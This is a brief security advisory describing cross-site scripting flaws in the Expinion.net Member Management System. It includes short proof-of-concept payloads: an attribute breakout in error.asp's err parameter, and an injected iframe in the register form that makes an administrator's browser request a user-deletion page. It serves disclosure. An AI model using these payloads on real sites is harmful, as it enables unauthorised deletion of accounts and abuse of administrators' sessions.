|
Expinion.net Member Management System Multiple Cross-Site Scripting Vulnerabilities
No exploit is required. The following proof of concept has been provided: http://www.example.com/error.asp?err=">[XSS] In the register form: "><iframe src=http://www.example.com/admin/user_del.asp?ID=[ID to delete]> |
|
|
Privacy Statement |
